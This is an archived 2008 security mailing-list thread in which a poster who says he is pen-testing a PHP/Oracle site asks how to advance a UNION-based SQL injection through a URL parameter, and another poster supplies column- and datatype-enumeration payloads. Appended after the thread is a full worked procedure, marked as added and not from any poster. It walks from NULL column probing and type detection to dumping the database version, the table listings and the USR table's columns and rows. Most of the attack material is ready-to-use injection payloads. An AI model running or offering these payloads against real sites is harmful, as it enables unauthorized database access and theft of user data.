Re: Oracle URL SQL Injection issue

From: Clone (c70n3@yahoo.co.in)
Date: Fri Jan 18 2008 - 19:26:52 EST


Thanks Jeff & everyone.

I've moved further after your emails. Really much
appreciated.

With Jeff's input below I enumerated that there are 2
columns.

This time I gave

http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr

Now I get following error:

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44

Then I tried the following:

http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr

http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr

And I get the error:

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44

The functionality of the page is to generate an email
page/forum email page.

Any idea what's next?

--- jeffrey rivero <jeffr76@yahoo.com> wrote:

> Hello all
> in your Union start by finding out how many columns
> there are
> ie.
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
> would give you 3 columns
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
> would give you 4
> then once you have that
> get the data types
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
> for the first to be a string
> and so on
> then you can start to get real data from the tables
> or
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--
>
> Jeff
>
> Clone wrote:
> > Hey List
> >
> > I am pen testing a web app that supplies sql
> > parameters on the URL something like
> >
> > http://x.y.z.a/item.php?Id=90
> >
> > I did blind SQL injection by adding AND 1=1 to confirm
> > the vulnerability.
> >
> > Now when I do
> >
> > http://x.y.z.a/item.php?Id=90'
> >
> > I get
> >
> > ociparse() [function.ociparse]: OCIParse: ORA-01756:
> > quoted string not properly terminated in item.php on
> > line 312
> >
> > Then I tried (after confirming presence of usr table
> > name)
> >
> >
> > http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
> >
> > and I get the error
> >
> > ociexecute() [function.ociexecute]: OCIStmtExecute:
> > ORA-01789: query block has incorrect number of result
> > columns in dbs.inc on line 44
> >
> > I know one valid user account in the oracle DB.
> >
> > Any idea what's the best strategy to move forward?
> >
> > I'm not getting any further from here so far.
> >
> > Any advice / help would be much appreciated.
> >
> > Cheers
> >
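The enumeration procedure this thread is working through, written out end to end as a worked example for Oracle. This is added here and is not part of any poster's message. The back-end statement (`SELECT name, descr FROM items WHERE id = 90`) and its column types are hypothetical; only the `usr` table name comes from the thread. Two Oracle specifics matter for the errors quoted above: every injected SELECT needs a FROM clause (use `DUAL`), and a `;` passed into the statement text is rejected with ORA-00911, so the payload is terminated with `--` alone. Probing with `NULL` first avoids ORA-01790, which is what `1,1` triggers when a column is not numeric:

```sql
-- Added worked example (not from the thread). Each statement is what the
-- database executes once the payload appended to "Id=90" is URL-decoded.
-- Assumed (hypothetical) back-end query:  SELECT name, descr FROM items WHERE id = 90
-- No ';' anywhere in the injected text; '--' comments out whatever follows.

-- 1. Column count. NULL is compatible with every datatype, so the count is
--    found without any type error. Wrong count -> ORA-01789.
SELECT name, descr FROM items WHERE id = 90 UNION SELECT NULL FROM dual--        -- ORA-01789
SELECT name, descr FROM items WHERE id = 90 UNION SELECT NULL, NULL FROM dual--  -- no error: 2 columns

--    Cross-check with ORDER BY: an index past the last column -> ORA-01785.
SELECT name, descr FROM items WHERE id = 90 ORDER BY 2--   -- ok
SELECT name, descr FROM items WHERE id = 90 ORDER BY 3--   -- ORA-01785

-- 2. Datatype per column, one literal at a time, the rest left NULL.
--    ORA-01790 means the literal's type is not the column's type.
SELECT name, descr FROM items WHERE id = 90 UNION SELECT 1, NULL FROM dual--     -- ORA-01790: column 1 not numeric
SELECT name, descr FROM items WHERE id = 90 UNION SELECT 'a', NULL FROM dual--   -- ok: column 1 is a string
SELECT name, descr FROM items WHERE id = 90 UNION SELECT NULL, 'a' FROM dual--   -- ok: column 2 is a string

-- 3. Real data through the string columns, starting with Oracle's own
--    data dictionary so no table or column names have to be guessed.
SELECT name, descr FROM items WHERE id = 90 UNION SELECT user, (SELECT banner FROM v$version WHERE rownum = 1) FROM dual--
SELECT name, descr FROM items WHERE id = 90 UNION SELECT owner, table_name FROM all_tables WHERE table_name = 'USR'--
-- If the page renders a single row, walk the columns of USR one at a time by column_id.
SELECT name, descr FROM items WHERE id = 90 UNION SELECT column_name, data_type FROM all_tab_columns WHERE table_name = 'USR' AND column_id = 1--
SELECT name, descr FROM items WHERE id = 90 UNION SELECT column_name, data_type FROM all_tab_columns WHERE table_name = 'USR' AND column_id = 2--
-- Then pull rows from USR itself, casting non-string columns into the string slot.
SELECT name, descr FROM items WHERE id = 90 UNION SELECT NULL, TO_CHAR(column_id) || ':' || column_name FROM all_tab_columns WHERE table_name = 'USR' AND rownum = 1--
```

In the URL, spaces become `%20` and the single quotes can be sent as-is; if a character such as `'` is escaped by the application before it reaches `ociparse`, the string probes in step 2 will fail and numeric-only probes have to carry the work.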





This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT